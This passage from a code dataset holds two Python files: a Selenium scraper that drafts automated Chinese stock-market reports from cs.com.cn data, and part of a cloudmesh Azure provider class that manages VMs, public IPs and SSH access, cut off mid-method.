+{"seq_id":"535420349","text":"# coding: utf-8\n# Generate the auto-drafted (\"Xiao Ming writes\") stock report. 2017.7.25\nimport datetime\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom datetime import datetime\nimport hashlib\nimport logging\n\nPHANTOMJS_PATH = 'D:\\\\tk\\\\Phantojs\\\\phantomjs-2.1.1-windows\\\\bin\\\\phantomjs'\n\n# Fetch all Shanghai Composite index figures (open, close, etc.)\ndef getHuZhiAllInformation():\n    # initialized up front so the return below cannot hit a NameError when\n    # the scrape fails before any data is collected\n    result = []\n    try:\n        url = 'http://news.stockdata.cs.com.cn/hqcenter/htmls/qcenter/singleStock/singleIndex.html?code=1A0001'\n        driver = webdriver.PhantomJS(PHANTOMJS_PATH)\n        driver.get(url)\n        # time.sleep(1)\n        time.sleep(5)\n        try:\n            element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, \"minPrice\")))\n        except Exception as e:\n            print(e)\n            logging.error(e)\n        finally:\n            newPrice = driver.find_element_by_id('newPrice').text\n            changePrice = driver.find_element_by_id('zd').text.split('(')[0]\n            changePercent = driver.find_element_by_id('zd').text.split('(')[1].split(')')[0]\n            openIndex = driver.find_element_by_id('open').text\n            yesterday = driver.find_element_by_id('preClose').text\n            maxPrice = driver.find_element_by_id('maxPrice').text\n            minPrice = driver.find_element_by_id('minPrice').text\n            totalAmount = driver.find_element_by_id('totalAmount').text\n            begin = totalAmount.index(':') + 1\n            end = totalAmount.index('(')\n            result.append(newPrice)\n            result.append(changePrice)\n            result.append(changePercent)\n            result.append(openIndex)\n            result.append(yesterday)\n            result.append(maxPrice)\n            result.append(minPrice)\n            result.append(totalAmount[begin:end])\n            # print(result)\n            driver.close()\n    except Exception as e:\n        print(e)\n        logging.error(e)\n    return result\n
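\n# NOTE (editor): this function and getShenZhiAllInformation below differ only in the\n# stock code embedded in the URL, so a parameterized helper would remove the\n# duplication. A sketch under that assumption (name and wiring are hypothetical):\n#\n#     def getIndexInformation(code):\n#         url = 'http://news.stockdata.cs.com.cn/hqcenter/htmls/qcenter/singleStock/singleIndex.html?code=%s' % code\n#         ...  # identical PhantomJS scraping to the body above\n#\n#     # getHuZhiAllInformation() == getIndexInformation('1A0001')\n#     # getShenZhiAllInformation() == getIndexInformation('2A01')\n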
# Fetch all Shenzhen Component index figures (open, close, etc.)\ndef getShenZhiAllInformation():\n    # initialized up front so the return below cannot hit a NameError when\n    # the scrape fails before any data is collected\n    result = []\n    try:\n        url = 'http://news.stockdata.cs.com.cn/hqcenter/htmls/qcenter/singleStock/singleIndex.html?code=2A01'\n        driver = webdriver.PhantomJS(PHANTOMJS_PATH)\n        driver.get(url)\n        time.sleep(5)\n        try:\n            element = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.ID, \"minPrice\")))\n        except Exception as e:\n            print(e)\n            logging.error(e)\n        finally:\n            newPrice = driver.find_element_by_id('newPrice').text\n            changePrice = driver.find_element_by_id('zd').text.split('(')[0]\n            changePercent = driver.find_element_by_id('zd').text.split('(')[1].split(')')[0]\n            openIndex = driver.find_element_by_id('open').text\n            yesterday = driver.find_element_by_id('preClose').text\n            maxPrice = driver.find_element_by_id('maxPrice').text\n            minPrice = driver.find_element_by_id('minPrice').text\n            totalAmount = driver.find_element_by_id('totalAmount').text\n            begin = totalAmount.index(':') + 1\n            end = totalAmount.index('(')\n            result.append(newPrice)\n            result.append(changePrice)\n            result.append(changePercent)\n            result.append(openIndex)\n            result.append(yesterday)\n            result.append(maxPrice)\n            result.append(minPrice)\n            result.append(totalAmount[begin:end])\n            driver.close()\n            # print(result)\n    except Exception as e:\n        print(e)\n        logging.error(e)\n\n    return result\n\n# Get the top-5 gainers for the Shanghai A, Shenzhen A, ChiNext and SME boards\ndef getAllTop5():\n    # initialized up front so the return below cannot hit a NameError when\n    # the scrape fails before any data is collected\n    result = []\n    try:\n        url = 'http://news.stockdata.cs.com.cn/hqcenter/htmls/qcenter/index.html'\n\n        driver = webdriver.PhantomJS(PHANTOMJS_PATH)\n        driver.get(url)\n        time.sleep(7)\n        driver.switch_to.frame('main')\n        time.sleep(5)\n        tmp = driver.find_element_by_id('tab_body_rise').text.split('\\n')[:5]\n        l1 = []\n        l2 = []\n        l3 = []\n        l4 = []\n        for i in tmp:\n            gegulist = i.split(' ')\n            l1.append([gegulist[0], gegulist[1]])\n\n        result.append(l1)\n\n        driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[2].click()\n        driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[2].click()\n        time.sleep(6)\n        tmp = driver.find_element_by_id('tab_body_rise').text.split('\\n')[:5]\n        for i in tmp:\n            gegulist = i.split(' ')\n            l2.append([gegulist[0], gegulist[1]])\n        result.append(l2)\n\n        driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[5].click()\n        driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[5].click()\n        time.sleep(6)\n        tmp = driver.find_element_by_id('tab_body_rise').text.split('\\n')[:5]\n        for i in tmp:\n            gegulist = i.split(' ')\n            l3.append([gegulist[0], gegulist[1]])\n        result.append(l3)\n\n        driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[6].click()\n        driver.find_element_by_id('topbar_hs1').find_elements_by_tag_name('a')[6].click()\n        time.sleep(6)\n        tmp = driver.find_element_by_id('tab_body_rise').text.split('\\n')[:5]\n        for i in tmp:\n            gegulist = i.split(' ')\n            l4.append([gegulist[0], gegulist[1]])\n        result.append(l4)\n\n        driver.close()\n    except Exception as e:\n        print(e)\n        logging.error(e)\n    return result\n\n# Build the Shanghai index headline\ndef generatHuZhiTitle(allInformation):\n    # allInformation = getHuZhiAllInformation()\n    if float(allInformation[1]) > 0:\n        rd = '涨'\n    else:\n        rd = '跌'\n\n    changePrice = abs(float(allInformation[1]))\n\n\n    result = '沪指' + rd + str(changePrice) + '点'\n    # print(result)\n    s = ''\n    # compare the hundreds digit of the previous close with the latest price\n    # to detect whether a round-hundred level was broken\n    if allInformation[4][1] == allInformation[0][1]:\n        # print(allInformation[4][1])\n        # print(allInformation[0][1])\n        pass\n    else:\n        s = ' 破' + allInformation[0][:2]+ '00' + '点'\n    result = result + s\n    return result\n\n# Build the Shenzhen index headline\ndef generatShenZhiTitle(allInformation):\n    # allInformation = getShenZhiAllInformation()\n    if float(allInformation[1]) > 0:\n        rd = '涨'\n    else:\n        rd = '跌'\n\n    changePrice = abs(float(allInformation[1]))\n\n\n    result = '深指' + rd + str(changePrice) + '点'\n    s = ''\n    if allInformation[4][1] == allInformation[0][1]:\n        pass\n    else:\n        s = ' 破' + allInformation[0][:2] + '00' + '点'\n    result = result + s\n    return result\n
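\n# NOTE (editor): the two headline builders above share all their logic except the\n# '沪指'/'深指' prefix; a common helper is an easy follow-up refactor. Hypothetical\n# sketch, mirroring the fields used above:\n#\n#     def makeTitle(prefix, info):\n#         rd = '涨' if float(info[1]) > 0 else '跌'\n#         title = prefix + rd + str(abs(float(info[1]))) + '点'\n#         if info[4][1] != info[0][1]:\n#             title += ' 破' + info[0][:2] + '00' + '点'\n#         return title\n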
\n# Build the article body\ndef generateContent(huAllIndex, shenAllIndex):\n    # huAllIndex = getHuZhiAllInformation()\n    # shenAllIndex = getShenZhiAllInformation()\n    totalTurnover = float(huAllIndex[-1]) + float(shenAllIndex[-1])\n    top5 = getAllTop5()\n    huTop5 = ''\n    shenTop5 = ''\n    cybTop5 = ''\n    zxbTop5 = ''\n\n    discription = ''\n    if float(huAllIndex[3]) > float(huAllIndex[4]):\n        discription = '高开'\n    else:\n        discription = '低开'\n\n    if float(huAllIndex[0]) > float(huAllIndex[3]):\n        discription = discription + '高走'\n    else:\n        discription = discription + '低走'\n\n    for i in top5[0]:\n        huTop5 = huTop5 + '(' + i[0] + ')' + ' ' + i[1] + ' '\n\n    for i in top5[1]:\n        shenTop5 = shenTop5 + '(' + i[0] + ')' + ' ' + i[1]+ ' '\n\n    for i in top5[2]:\n        cybTop5 = cybTop5 + '(' + i[0] + ')' + ' '+ i[1]+ ' '\n\n    for i in top5[3]:\n        zxbTop5 = zxbTop5 + '(' + i[0] + ')' + ' ' + i[1] + ' '\n\n    if float(huAllIndex[1]) > 0:\n        hrd1 = '涨'\n        hrd2 = '涨幅'\n        hrd3 = huAllIndex[1]\n        hrdindex = huAllIndex[2]\n    else:\n        hrd1 = '跌'\n        hrd2 = '跌幅'\n        hrd3 = huAllIndex[1][1:]\n        hrdindex = huAllIndex[2][1:]\n\n    if float(shenAllIndex[1]) > 0:\n        srd1 = '涨'\n        srd2 = '涨幅'\n        srd3 = shenAllIndex[1]\n        srdindex = shenAllIndex[2]\n    else:\n        srd1 = '跌'\n        srd2 = '跌幅'\n        srd3 = shenAllIndex[1][1:]\n        srdindex = shenAllIndex[2][1:]\n\n    result1 = '今日,沪深两市'+ discription + '。截止收盘, 沪指报' + huAllIndex[0] + '点,' + hrd1 + hrd3 + '点,' + hrd2 + hrdindex + ';' + '深成指数报' + shenAllIndex[0] + '点,'+ srd1 + srd3 + '点,' + srd2 + srdindex + ',' + '两市全日成交'+ str(totalTurnover)[:7] + '亿元。' + '\\n'*2\n    result2 = '深A涨幅榜前五:' + shenTop5 + '\\n' + '沪A涨幅榜前五:' + huTop5 + '\\n' + '创业板涨幅榜前五:' + cybTop5 + '\\n' + '中小板涨幅榜前五:'+ zxbTop5\n    # print(result1)\n    # print()\n    # print(result2)\n    result = result1 + result2\n    return result\n\n# Use the Sina stock quote API to decide whether today is a trading day\ndef isMarketDay():\n    flag = False\n    # probe a few heavyweight tickers; the quote's date field equals today's\n    # date only on a trading day (the original repeated this block verbatim\n    # for each of the three codes)\n    for code in ('sh601398', 'sh601288', 'sh601939'):\n        try:\n            url1 = 'http://hq.sinajs.cn/list=%s' % code\n            response = requests.get(url1)\n            # the quote date is the third field from the end of the payload\n            dateString = response.text.split('=')[1].split(',')[-3]\n            datelist = dateString.split('-')\n            today = datetime.now()\n            todaylist = [str(today.year), str(today.month).zfill(2), str(today.day).zfill(2)]\n            if datelist == todaylist:\n                return True\n            flag = False\n        except Exception as e:\n            print(e)\n            logging.error(e)\n    return flag\n
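\n# NOTE (editor): for orientation, a Sina quote payload looks roughly like the\n# following (values illustrative, not real data):\n#\n#     var hq_str_sh601398=\"工商银行,5.30,5.31,5.32,5.35,5.28,...,2017-07-25,15:00:00,00\";\n#\n# so response.text.split('=')[1].split(',')[-3] above extracts the quote date\n# that is compared against today's date.\n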
\n# Generate the complete auto-drafted article\ndef generateAll():\n    result = None\n    try:\n        if isMarketDay():\n            huAllIndex = getHuZhiAllInformation()\n            shenAllIndex = getShenZhiAllInformation()\n\n            title1 = generatHuZhiTitle(huAllIndex)\n            title2 = generatShenZhiTitle(shenAllIndex)\n            content = generateContent(huAllIndex, shenAllIndex)\n\n            content_md5 = hashlib.md5(content.encode()).hexdigest()\n            ctitle = '今日, ' + title1 + ',' + title2\n            cpubtime = int(time.time())\n            csource = '中证网'\n            caurl = 'http://news.stockdata.cs.com.cn/hqcenter/htmls/qcenter/index.html' + \"#robot1#\" + content_md5\n            cbody = content\n            cparagraphnum = 2\n            has_image = 0\n            # result = title1 + ',' + title2 + \"\\n\" * 2 + content\n            result = {'caurl': caurl, 'ctitle': ctitle,'cpubtime': cpubtime, 'csource': csource, 'cbody': cbody, 'cparagraphnum' : cparagraphnum, 'has_image': has_image}\n        else:\n            result = 0\n    except Exception as e:\n        print(e)\n        logging.error(e)\n    return result\n\n# If the first attempt produced None because the scrape failed, fetch once more (to confirm)\ndef generateXiaoMingXieGao():\n    result = generateAll()\n\n    if result is None:\n        result = generateAll()\n\n    return result\n\ndef main():\n    # fixed: generateAll() takes no arguments (the original passed a stray cwid)\n    generateAll()\n\n\nif __name__ == '__main__':\n\n    result = generateXiaoMingXieGao()\n    print(result)\n","sub_path":"test/xiaomingxiegao/gupiaoxinxi/generateXiaoMingXieGao.py","file_name":"generateXiaoMingXieGao.py","file_ext":"py","file_size_in_byte":12908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"468700700","text":"import ctypes\nimport os\nimport subprocess\nfrom datetime import datetime\nfrom pprint import pprint\nfrom sys import platform\n\nfrom azure.common.credentials import ServicePrincipalCredentials\nfrom azure.mgmt.compute import ComputeManagementClient\nfrom azure.mgmt.network import NetworkManagementClient\nfrom azure.mgmt.network.v2018_12_01.models import SecurityRule\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom cloudmesh.abstract.ComputeNodeABC import ComputeNodeABC\nfrom cloudmesh.common.Printer import Printer\nfrom cloudmesh.common.console import Console\nfrom cloudmesh.common.debug import VERBOSE\nfrom cloudmesh.common.util import HEADING, banner\nfrom cloudmesh.configuration.Config import Config\nfrom cloudmesh.mongo.CmDatabase import CmDatabase\nfrom cloudmesh.provider import ComputeProviderPlugin\nfrom msrestazure.azure_exceptions import CloudError\n\n\ndef _remove_mongo_id_obj(dict_list):\n    for i in dict_list:\n        try:\n            i.pop('_id')\n        except KeyError:\n            pass\n\n    return dict_list\n\n\ndef _get_az_vm_status(az_status):\n    az_status = az_status.lower()\n    if 'running' in az_status:\n        return 'ACTIVE'\n    elif 'stopped' in az_status:\n        return 'STOPPED'\n    else:\n        return None\n\n\n# noinspection PyPep8\nclass Provider(ComputeNodeABC, ComputeProviderPlugin):\n    \"\"\"\n    verbosity\n\n    8 - prints major actions\n    9 - prints all images\n    10 - prints all update dicts\n\n    \"\"\"\n    kind = 'azure'\n\n    sample = \"\"\"\n    cloudmesh:\n      cloud:\n        {name}:\n          cm:\n            active: true\n            heading: {name}\n            host: TBD\n            label: {name}\n            kind: azure\n            version: latest\n            service: compute\n          default:\n            image: Canonical:UbuntuServer:16.04.0-LTS:latest\n            size: Basic_A0\n            resource_group: cloudmesh\n            storage_account: cmdrive\n            network: cmnetwork\n            subnet: cmsubnet\n            blob_container: vhds\n            AZURE_VM_IP_CONFIG: cloudmesh-ip-config\n            AZURE_VM_NIC: cloudmesh-nic\n            AZURE_VM_DISK_NAME: cloudmesh-os-disk\n            AZURE_VM_USER: TBD\n            AZURE_VM_PASSWORD: TBD\n            AZURE_VM_NAME: cloudmeshVM\n          credentials:\n            AZURE_TENANT_ID: {tenantid}\n            AZURE_SUBSCRIPTION_ID: {subscriptionid}\n            AZURE_APPLICATION_ID: {applicationid}\n            AZURE_SECRET_KEY: {secretkey}\n            AZURE_REGION: eastus\n    \"\"\"\n\n    vm_state = [\n        'ACTIVE',\n        'BUILDING',\n        'DELETED',\n        'ERROR',\n        'HARD_REBOOT',\n        'PASSWORD',\n        'PAUSED',\n        'REBOOT',\n        'REBUILD',\n        'RESCUED',\n        'RESIZED',\n        'REVERT_RESIZE',\n        'SHUTOFF',\n        'SOFT_DELETED',\n        'STOPPED',\n        'SUSPENDED',\n        'UNKNOWN',\n        'VERIFY_RESIZE'\n    ]\n\n    output = {\n        \"status\": {\n            \"sort_keys\": [\"cm.name\"],\n            \"order\": 
[\"cm.name\",\n \"cm.cloud\",\n \"vm_state\",\n \"status\",\n \"task_state\"],\n \"header\": [\"Name\",\n \"Cloud\",\n \"State\",\n \"Status\",\n \"Task\"]\n },\n \"vm\": {\n \"sort_keys\": [\"cm.name\"],\n \"order\": [\n \"cm.name\",\n \"cm.cloud\",\n \"id\",\n \"type\",\n \"location\",\n \"hardware_profile.vm_size\",\n \"storage_profile.image_reference.offer\",\n \"storage_profile.image_reference.sku\",\n \"storage_profile.os_disk.disk_size_gb\",\n \"provisioning_state\",\n \"vm_id\",\n \"cm.kind\"],\n \"header\": [\n \"Name\",\n \"Cloud\",\n \"Id\",\n \"Type\",\n \"Location\",\n \"VM Size\",\n \"OS Name\",\n \"OS Version\",\n \"OS Disk Size\",\n \"Provisioning State\",\n \"VM ID\",\n \"Kind\"]\n },\n \"image\": {\n \"sort_keys\": [\"cm.name\",\n \"plan.publisher\"],\n \"order\": [\"cm.name\",\n \"location\",\n \"plan.publisher\",\n \"plan.name\",\n \"plan.product\",\n \"operating_system\"],\n \"header\": [\"Name\",\n \"Location\",\n \"Publisher\",\n \"Plan Name\",\n \"Product\",\n \"Operating System\",\n ]\n },\n \"flavor\": {\n \"sort_keys\": [\"name\",\n \"number_of_cores\",\n \"os_disk_size_in_mb\"],\n \"order\": [\"name\",\n \"number_of_cores\",\n \"os_disk_size_in_mb\",\n \"resource_disk_size_in_mb\",\n \"memory_in_mb\",\n \"max_data_disk_count\"],\n \"header\": [\"Name\",\n \"NumberOfCores\",\n \"OS_Disk_Size\",\n \"Resource_Disk_Size\",\n \"Memory\",\n \"Max_Data_Disk\"]},\n # \"status\": {},\n \"key\": {}, # Niranda, we need this for printing tables\n \"secgroup\": {}, # Niranda, we need this for printing tables\n \"secrule\": {}, # Niranda, we need this for printing tables\n }\n\n # noinspection PyPep8Naming\n def __init__(self, name=\"azure\", credentials=None):\n \"\"\"\n Initializes the provider. The default parameters are read from the\n configuration file that is defined in yaml format.\n\n :param name: The name of the provider as defined in the yaml file\n :param configuration: The location of the yaml configuration file\n \"\"\"\n\n conf = Config()[\"cloudmesh\"]\n\n self.user = Config()[\"cloudmesh\"][\"profile\"][\"user\"]\n\n self.spec = conf[\"cloud\"][name]\n self.cloud = name\n\n cred = self.spec[\"credentials\"]\n self.default = self.spec[\"default\"]\n self.cloudtype = self.spec[\"cm\"][\"kind\"]\n super().__init__(name)\n\n # update credentials with the passed dict\n if credentials is not None:\n cred.update(credentials)\n\n VERBOSE(cred, verbose=10)\n\n if self.cloudtype != 'azure':\n Console.error(\"This class is meant for azure cloud\")\n\n # ServicePrincipalCredentials related Variables to configure in\n # cloudmesh.yaml file\n\n # AZURE_APPLICATION_ID = ''\n\n # AZURE_SECRET_KEY = ''\n\n # AZURE_TENANT_ID = ''\n\n credentials = ServicePrincipalCredentials(\n client_id=cred['AZURE_APPLICATION_ID'],\n secret=cred['AZURE_SECRET_KEY'],\n tenant=cred['AZURE_TENANT_ID']\n )\n\n subscription = cred['AZURE_SUBSCRIPTION_ID']\n\n # Management Clients\n self.resource_client = ResourceManagementClient(\n credentials, subscription)\n self.compute_client = ComputeManagementClient(\n credentials, subscription)\n self.network_client = NetworkManagementClient(\n credentials, subscription)\n\n # VMs abbreviation\n self.vms = self.compute_client.virtual_machines\n self.imgs = self.compute_client.virtual_machine_images\n\n # Azure Resource Group\n self.GROUP_NAME = self.default[\"group\"]\n\n # Azure Datacenter Region\n self.LOCATION = cred[\"AZURE_REGION\"]\n\n # NetworkManagementClient related Variables\n self.VNET_NAME = self.default[\"network\"]\n self.SUBNET_NAME = 
self.default[\"subnet\"]\n        self.IP_CONFIG_NAME = self.default[\"AZURE_VM_IP_CONFIG\"]\n\n        # Azure VM Storage details\n        self.OS_DISK_NAME = self.default[\"AZURE_VM_DISK_NAME\"]\n        self.USERNAME = self.default[\"AZURE_VM_USER\"]\n        self.PASSWORD = self.default[\"AZURE_VM_PASSWORD\"]\n        self.VM_NAME = self.default[\"AZURE_VM_NAME\"]\n        self.NIC_NAME = self.default[\"AZURE_VM_NIC\"]\n\n        # public IPs\n        self.PUBLIC_IP__NAME = self.VM_NAME + '-pub-ip'\n\n        # Create or Update Resource group\n        self._get_resource_group()\n\n        self.cmDatabase = CmDatabase()\n\n        self.protocol_str_map = {\n            'tcp': 'Tcp',\n            'udp': 'Udp',\n            'icmp': 'Icmp',\n            'esp': 'Esp',\n            'ah': 'Ah',\n            '*': '*'\n        }\n\n    # noinspection PyPep8Naming\n    def Print(self, data, output=None, kind=None):\n        if output == \"table\":\n            if kind == \"secrule\":\n\n                result = []\n                for group in data:\n                    for rule in group['security_group_rules']:\n                        rule['name'] = group['name']\n                        result.append(rule)\n                data = result\n\n            # .get() instead of hard indexing: the \"key\"/\"secgroup\"/\"secrule\"\n            # entries above are still empty dicts, and none of the entries\n            # define 'humanize', so [] lookups would raise KeyError here\n            order = self.output[kind].get('order')  # not pretty\n            header = self.output[kind].get('header')  # not pretty\n            humanize = self.output[kind].get('humanize')  # not pretty\n\n            print(Printer.flatwrite(data,\n                                    sort_keys=[\"name\"],\n                                    order=order,\n                                    header=header,\n                                    output=output,\n                                    humanize=humanize)\n                  )\n        else:\n            print(Printer.write(data, output=output))\n\n    def keys(self):\n        \"\"\"\n        The keys command in Azure is not supported\n\n        TODO: BUG: therefore it should just return the keys from the local db to\n        make it appear it is supported. So instead return that output,\n        see how it is implemented in key list\n\n        :return:\n        \"\"\"\n        Console.error(\"Key list is not supported in Azure!\")\n        Console.msg(\"Please use \")\n        Console.msg(\"\")\n        Console.msg(\"   cms key list \")\n        Console.msg(\"\")\n        return None\n\n    def key_upload(self, key=None):\n        \"\"\"\n        TODO: implement alternative\n\n        azure does not allow explicit key upload!\n\n\n        :param key:\n        :return:\n        \"\"\"\n        Console.error(f'Azure does not allow explicit key upload! '\n                      f'Please use \\'cms key\\' operations to add keys to the '\n                      f'local db and reference them at the VM creation!')\n\n        return None\n\n    def key_delete(self, name=None):\n        \"\"\"\n        TODO: implement alternative\n\n        azure does not allow explicit key upload!\n\n\n        :param name:\n        :return:\n        \"\"\"\n        Console.error(f\"Azure does not allow explicit key delete! \"\n                      f\"Please use 'cms key' operations to delete keys from \"\n                      f\"the local db!\")\n        return None\n\n    def _get_az_public_ip(self, ip_name):\n        ip = next((x for x in self.list_public_ips() if\n                   x['name'] == ip_name), None)\n        return ip\n\n    def get_public_ip(self, name=None):\n        \"\"\"\n        returns public IP by vm name from the Az public IPs\n\n        :param name:\n        :return:\n        \"\"\"\n        _, pub_ip = self._get_pub_ip_for_vm(name)\n        return pub_ip['ip_address']\n\n    # these are available to be associated\n    def list_public_ips(self, ip=None, available=False):\n        \"\"\"\n        lists public ips of the group\n\n        :param ip:\n        :param available:\n        :return:\n        \"\"\"\n        list_result = [i.__dict__ for i in\n                       self.network_client.public_ip_addresses.list(\n                           self.GROUP_NAME)]\n\n        return self.update_dict(list_result, kind='ip')\n\n    def delete_public_ip(self, ip=None):\n        \"\"\"\n        deletes public ip by name\n\n        :param ip:\n        :return:\n        \"\"\"\n        if ip is not None:\n            res = self.network_client.public_ip_addresses.delete(\n                self.GROUP_NAME,\n                ip\n            )\n            res.wait()\n\n            Console.info(f'{ip} was deleted!')\n        else:\n            Console.warning('No ip was provided')\n\n    def create_public_ip(self):\n        \"\"\"\n        Creates public IP for the group using the ip name provided in the config\n        as a prefix\n\n        :return:\n        \"\"\"\n        current_pub_count = len(self.list_public_ips())\n\n        public_ip_params = {\n            'location': self.LOCATION,\n            'sku': {\n                'name': 'Basic',\n            }\n        }\n\n        creation_result = self.network_client.public_ip_addresses. \\\n            create_or_update(self.GROUP_NAME,\n                             f\"{self.PUBLIC_IP__NAME}_{current_pub_count}\",\n                             public_ip_params,\n                             ).result()\n        Console.info(\"Public IP created: \" + creation_result.name)\n        return self.update_dict([creation_result.as_dict()], kind='ip')\n\n    def find_available_public_ip(self):\n        \"\"\"\n        Azure currently has no direct API to check if an IP is available or not!\n        Hence create an IP every time this method is called!\n\n        :return:\n        \"\"\"\n        # pub_ips = self.list_public_ips()\n        #\n        # for ip in pub_ips:\n        #     if ip['ip_configuration'] is None:\n        #         # if ip_configuration is none -> ip is available\n        #         # --> return it!\n        #         Console.info(f\"Found available ip {ip['name']}\")\n        #         return ip\n\n        # if not len(pub_ips) == 0 create one\n        Console.info(f\"Creating new public IP\")\n        return self.create_public_ip()\n\n    def attach_public_ip(self, node=None, ip=None):\n        \"\"\"\n        attaches a public ip to a node\n\n        :param node:\n        :param ip:\n        :return:\n        \"\"\"\n        # note: a fresh public IP is always allocated here; the passed ip/node\n        # arguments are currently unused\n        ip = self.find_available_public_ip()[0]\n\n        # remove cm dict\n        ip.pop('cm')\n\n        # to attach a public ip, get the nic and update the public ip field via\n        # IP config\n        ip_config = self.network_client.network_interface_ip_configurations.get(\n            self.GROUP_NAME, self.NIC_NAME, self.IP_CONFIG_NAME\n        )\n\n        ip_config.public_ip_address = ip\n\n        res = self.network_client.network_interfaces.create_or_update(\n            self.GROUP_NAME,\n            self.NIC_NAME,\n            parameters={\n                'location': self.LOCATION,\n                'ip_configurations': [ip_config.as_dict()]\n            }\n        )\n\n        return res.result()\n\n    def detach_public_ip(self, node=None, ip=None):\n        \"\"\"\n        detaches public IP\n\n        :param node:\n        :param ip:\n        :return:\n        \"\"\"\n        if ip is None:\n            vm_obj = self._get_local_vm(node)\n            nic_id = vm_obj['network_profile']['network_interfaces'][0]['id']\n            pub_ip = self._get_az_pub_ip_from_nic_id(nic_id)\n\n            ip = pub_ip.name\n\n        req = self.network_client.public_ip_addresses.delete(self.GROUP_NAME,\n                                                             ip)\n        req.wait()\n        Console.info(f\"deleted pub ip {ip}\")\n
    def _get_az_pub_ip_from_nic_id(self, nic_id):\n        \"\"\"\n        gets azure public ip using NIC ID\n\n        :param nic_id:\n        :return:\n        \"\"\"\n        pub_ip = None\n        for ip in list(self.network_client.public_ip_addresses\n                               .list(self.GROUP_NAME)):\n            if ip.ip_configuration is not None and nic_id \\\n                    in ip.ip_configuration.id:\n                pub_ip = ip\n        return pub_ip\n\n    def _get_local_vm(self, vm_name, quiet=False):\n        \"\"\"\n        gets local vm from the db\n\n        :param vm_name:\n        :param quiet:\n        :return:\n        \"\"\"\n        vm_search = list(\n            self.cmDatabase.collection('azure-vm').find({'name': vm_name}))\n\n        if not quiet and len(vm_search) == 0:\n            raise Exception(f\"unable to locate {vm_name} in local db!\")\n\n        return vm_search[0] if len(vm_search) > 0 else None\n\n    def _get_pub_ip_for_vm(self, vm):\n        if isinstance(vm, dict):\n            vm_obj = vm\n        else:\n            vm_obj = self._get_local_vm(vm)\n\n        nic_id = vm_obj['network_profile']['network_interfaces'][0]['id']\n\n        pub_ip = self._get_az_pub_ip_from_nic_id(nic_id)\n        if pub_ip is None:\n            raise Exception(f\"unable to find public IP for {vm}\")\n\n        return vm_obj, pub_ip.as_dict()\n\n    # noinspection PyPep8\n    def ssh(self, vm=None, command=None):\n        \"\"\"\n        runs ssh\n\n        :param vm:\n        :param command:\n        :return:\n        \"\"\"\n\n        if vm is None:\n            raise Exception(\"vm can not be null\")\n\n        if command is None:\n            command = \"\"\n\n        vm_obj, pub_ip = self._get_pub_ip_for_vm(vm)\n\n        # in the current API (vm/Provider), it does not provide a key name for\n        # ssh. therefore, the key needs to be pulled from the vm. And therefore\n        # key name is injected to the local db entry as 'ssh_key_name'\n        key_obj = self._get_local_key_content(vm_obj['cm']['ssh_key_name'])\n\n        cmd = \"ssh \" \\\n              \"-o StrictHostKeyChecking=no \" \\\n              \"-o UserKnownHostsFile=/dev/null \" \\\n              f\"-i {key_obj['location']['private']} \" \\\n              f\"{self.USERNAME}@{pub_ip['ip_address']} {command}\"\n        cmd = cmd.strip()\n\n        # WOW64 file-system redirection only needs to be disabled on Windows;\n        # the context manager is a no-op elsewhere. Defined once here instead\n        # of the four identical copies the original carried.\n        class disable_file_system_redirection:\n            def __enter__(self):\n                self.success = False\n                if platform.lower() == 'win32':\n                    self._disable = ctypes.windll.kernel32.Wow64DisableWow64FsRedirection\n                    self._revert = ctypes.windll.kernel32.Wow64RevertWow64FsRedirection\n                    self.old_value = ctypes.c_long()\n                    self.success = self._disable(ctypes.byref(self.old_value))\n\n            def __exit__(self, type_, value, traceback):\n                if self.success:\n                    self._revert(self.old_value)\n\n        with disable_file_system_redirection():\n            if command == \"\":\n                # interactive session\n                os.system(cmd)\n                return None\n\n            Console.info('cmd: ' + cmd)\n            ssh = subprocess.Popen(cmd,\n                                   shell=True,\n                                   stdout=subprocess.PIPE,\n                                   stderr=subprocess.PIPE)\n            result = ssh.stdout.read().decode(\"utf-8\")\n            if not result:\n                error = ssh.stderr.readlines()\n                Console.error(error)\n            else:\n                Console.info(\"cmd result: \" + result)\n            return result\n\n    def _get_resource_group(self):\n        groups = self.resource_client.resource_groups\n        if groups.check_existence(self.GROUP_NAME):\n            return groups.get(self.GROUP_NAME)\n        else:\n            # Create or update the Resource Group\n            Console.info('Creating Azure Resource Group')\n            res = groups.create_or_update(self.GROUP_NAME,\n                                          {'location': self.LOCATION})\n            Console.info('Azure Resource Group created: ' + res.name)\n            return res\n
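\n    # A minimal usage sketch for ssh() (vm name and command are hypothetical, and\n    # the key recorded in the vm's cm.ssh_key_name must exist in the local db):\n    #\n    #     provider = Provider(name='azure')\n    #     provider.ssh(vm='cloudmeshVM', command='uname -a')\n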
    def set_server_metadata(self, name, **metadata):\n        \"\"\"\n        sets server metadata\n\n        :param name:\n        :param metadata:\n        :return:\n        \"\"\"\n        # see https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-using-tags\n        # https://github.com/Azure-Samples/virtual-machines-python-manage/blob/master/example.py\n        # tags = FlatDict(cm)\n\n        data = {}\n        if metadata is not None and isinstance(metadata, dict) and 'cm' in metadata:\n            if isinstance(metadata['cm'], str):\n                import ast\n                data.update(ast.literal_eval(metadata['cm']))\n            else:\n                data.update(metadata['cm'])\n\n        if name is None:\n            name = self.VM_NAME\n\n        async_vm_key_updates = self.vms.create_or_update(\n            self.GROUP_NAME,\n            name,\n            {\n                'location': self.LOCATION,\n                'tags': data\n            })\n        async_vm_key_updates.wait()\n\n        return async_vm_key_updates.result().tags\n\n    def get_server_metadata(self, name):\n        \"\"\"\n        gets server metadata\n\n        :param name:\n        :return:\n        \"\"\"\n        if name is None:\n            name = self.VM_NAME\n\n        tags_dict = self.vms.get(self.GROUP_NAME, name)\n\n        return tags_dict.tags\n\n    def delete_server_metadata(self, name, key=None):\n        \"\"\"\n        deletes server 